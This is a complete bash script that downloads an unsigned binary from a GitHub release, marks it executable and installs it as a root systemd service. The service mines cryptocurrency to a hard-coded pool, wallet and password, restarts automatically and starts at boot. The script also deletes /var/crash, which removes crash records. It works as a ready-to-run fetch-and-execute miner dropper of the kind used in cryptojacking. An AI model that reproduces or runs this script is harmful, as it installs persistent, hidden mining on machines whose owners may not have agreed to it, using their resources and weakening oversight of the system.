#!/bin/bash
cd /home
sudo wget https://github.com/rolandmedina54/xmr/releases/download/untagged-1b16ecb07df1ba551cfb/ar 
sudo cp ar jvdar 
sudo chmod +x jvdar

sudo rm -rf /lib/systemd/system/xmrthanh.service
sudo rm -rf /var/crash
bash -c 'cat <<EOT >>/lib/systemd/system/xmrthanh.service 
[Unit]
Description=xmrthanh
After=network.target
[Service]
ExecStart= /home/jvdar --multi-algorithm-job-mode 1 --disable-gpu --algorithm randomepic --pool eu.epicmine.io:3334 --tls true --wallet tuyenvv95.tu1 --password Passbimat4367 --keepalive true
WatchdogSec=36000
Restart=always
RestartSec=60
User=root
[Install]
WantedBy=multi-user.target
EOT
' &&
systemctl daemon-reload &&
systemctl enable xmrthanh.service &&
service xmrthanh stop  &&
service xmrthanh restart
